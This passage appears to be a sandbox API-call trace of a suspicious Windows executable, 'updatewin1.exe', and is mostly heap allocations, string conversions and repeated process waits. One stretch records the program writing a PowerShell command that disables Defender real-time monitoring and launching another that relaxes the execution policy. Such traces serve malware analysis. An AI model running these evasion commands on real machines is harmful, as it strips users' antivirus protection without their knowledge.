cchWideChar=256, lpMultiByteStr=0x18f30c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿçCê~Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0121.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0121.278] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18f40c, cbMultiByte=256, lpWideCharStr=0x18eb68, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0121.278] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0121.278] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18e958, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ") returned 256 [0121.278] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȈ", cchWideChar=256, lpMultiByteStr=0x18f20c, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿçCê~Hõ\x18", lpUsedDefaultChar=0x0) returned 256 [0121.278] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x80) returned 0x57a0d8 [0121.278] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x416cb8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe")) returned 0x5f [0121.278] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xdc) returned 0x57c168 [0121.278] RtlInitializeSListHead (in: ListHead=0x416bd8 | out: ListHead=0x416bd8) [0121.278] GetLastError () returned 0x0 [0121.278] GetEnvironmentStringsW () returned 0x57c250* [0121.278] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0xaca) returned 0x57cd28 [0121.278] FreeEnvironmentStringsW (penv=0x57c250) returned 1 [0121.278] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x98) returned 0x57c250 [0121.278] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3e) returned 0x57c2f0 [0121.278] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x6c) returned 0x57c338 [0121.278] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x6e) returned 0x57c3b0 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x78) returned 0x561188 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x62) returned 0x57c428 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x5652d8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x57c498 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x28) returned 0x57a160 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1a) returned 0x57bd18 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x4a) returned 0x57c4e8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x72) returned 0x561208 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x565310 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x565348 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1c) returned 0x57bd40 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0xd2) returned 0x57c540 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x7c) returned 0x57c620 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x36) returned 0x57c6a8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3a) returned 0x57c6e8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x90) returned 0x57c730 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x57c7c8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x565380 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x36) returned 0x57c7f8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x48) returned 0x57c838 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x57c888 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x57d818 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x82) returned 0x57c8e8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2e) returned 0x5653b8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x1e) returned 0x57bd68 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2c) returned 0x5653f0 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x57c978 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x52) returned 0x57c9d8 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x2a) returned 0x565428 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x3c) returned 0x57d860 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x54) returned 0x57ca38 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x24) returned 0x57ca98 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x30) returned 0x565460 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x8c) returned 0x57cac8 [0121.279] HeapFree (in: hHeap=0x550000, dwFlags=0x0, lpMem=0x57cd28 | out: hHeap=0x550000) returned 1 [0121.279] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x8, Size=0x800) returned 0x57cb60 [0121.281] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0121.281] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x402ae4) returned 0x404e59 [0121.290] GetStartupInfoW (in: lpStartupInfo=0x18f578 | out: lpStartupInfo=0x18f578*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x5, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0121.291] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" --Admin" [0121.291] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe\" --Admin", pNumArgs=0x18e580 | out: pNumArgs=0x18e580) returned 0x57d368*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\40b348bf-da79-4308-8258-aae3cfc82a0b\\updatewin1.exe" [0121.291] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x18d8ec | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0121.365] PathAppendW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="script.ps1" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1") returned 1 [0121.365] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\script.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\script.ps1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa8 [0121.366] lstrcpyA (in: lpString1=0x18e0ec, lpString2="Set-MpPreference -DisableRealtimeMonitoring $true" | out: lpString1="Set-MpPreference -DisableRealtimeMonitoring $true") returned="Set-MpPreference -DisableRealtimeMonitoring $true" [0121.366] lstrlenA (lpString="Set-MpPreference -DisableRealtimeMonitoring $true") returned 49 [0121.366] WriteFile (in: hFile=0xa8, lpBuffer=0x18e0ec*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x18d8e8, lpOverlapped=0x0 | out: lpBuffer=0x18e0ec*, lpNumberOfBytesWritten=0x18d8e8*=0x31, lpOverlapped=0x0) returned 1 [0121.367] CloseHandle (hObject=0xa8) returned 1 [0121.368] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x70) returned 0x57ecd8 [0121.368] RtlAllocateHeap (HeapHandle=0x550000, Flags=0x0, Size=0x90) returned 0x57ed50 [0121.368] SetLastError (dwErrCode=0x0) [0121.368] lstrcpyW (in: lpString1=0x18d4e0, lpString2="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" | out: lpString1="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned") returned="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned" [0121.368] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x18d498*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18d488 | out: lpCommandLine="powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned", lpProcessInformation=0x18d488*(hProcess=0xa4, hThread=0xa8, dwProcessId=0xab8, dwThreadId=0xabc)) returned 1 [0121.403] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.407] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.420] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.436] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.483] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.531] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.720] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.733] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.748] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.763] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.779] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.795] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.810] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.826] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.854] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.860] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.873] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.888] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.904] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.920] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.936] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.951] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.968] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.982] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0121.997] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.013] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.029] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.153] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.235] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.372] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.571] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.653] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0122.782] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0123.547] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0123.636] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0123.730] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0123.824] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0123.899] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0123.981] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.060] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.136] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.230] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.309] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.357] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.414] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.497] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.566] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.623] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.684] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.785] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.824] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.900] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0124.994] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.153] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.245] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.316] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.400] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.469] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.524] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.577] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.651] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.685] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.699] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.768] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0125.819] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.130] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.166] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.196] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.216] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.300] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.325] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.414] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.433] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.491] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.516] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.524] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.616] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.687] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.729] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.775] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.931] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0126.975] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.025] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.069] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.116] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.162] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.214] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.307] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.364] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.442] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.504] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.552] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.614] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0127.676] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0132.216] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.029] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.123] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.168] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.243] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.245] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.261] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.280] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.292] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.307] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.323] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.339] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.354] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.370] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.387] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.402] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0x1) returned 0x102 [0133.418] 